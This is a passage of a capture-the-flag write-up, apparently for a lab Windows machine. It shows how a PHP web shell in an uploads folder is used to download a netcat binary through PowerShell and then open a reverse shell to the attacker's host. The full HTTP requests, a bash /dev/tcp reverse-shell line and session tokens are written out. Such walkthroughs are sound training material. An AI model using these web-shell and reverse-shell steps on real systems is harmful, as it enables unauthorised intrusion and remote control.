Skip to main content

Remote Code Execution

We can perform some basic commands to discover that we are the www-data user.

Whoami

Whoami

Upload nc.exe for reverse shell

Since this is a windows box, we are not able to utilise the usual bash -i >& /dev/tcp/<ip>/<port> 0>&1 method. Hence, the next simplest method would be to upload a netcat binary.

GET /portal/uploads/nothing.php?cmd=powershell+-command+"wget+<ip>:<port>/nc64.exe+-O+nc64.exe" HTTP/1.1
Host: 10.10.10.228
Content-Length: 0
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHBZNum5szzVSddPn
Origin: http://10.10.10.228
Referer: http://10.10.10.228/portal/php/files.php
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=paul47200b180ccd6835d25d034eeb6e6390; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7InVzZXJuYW1lIjoicGF1bCJ9fQ.7pc5S1P76YsrWhi_gu23bzYLYWxqORkr0WtEz_IUtCU
Connection: close

There is a cron job which deletes any executable from the uploads directory. Hence, we have to be fast!

Initiate the reverse shell

GET /portal/uploads/nothing.php?cmd=nc64.exe+<LHOST>+<LPORT>+-e+cmd.exe HTTP/1.1
Host: 10.10.10.228
Content-Length: 0
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHBZNum5szzVSddPn
Origin: http://10.10.10.228
Referer: http://10.10.10.228/portal/php/files.php
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=paul47200b180ccd6835d25d034eeb6e6390; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7InVzZXJuYW1lIjoicGF1bCJ9fQ.7pc5S1P76YsrWhi_gu23bzYLYWxqORkr0WtEz_IUtCU
Connection: close

Obtain the shell

Reverse shell success!

We can then continue to explore the Windows machine.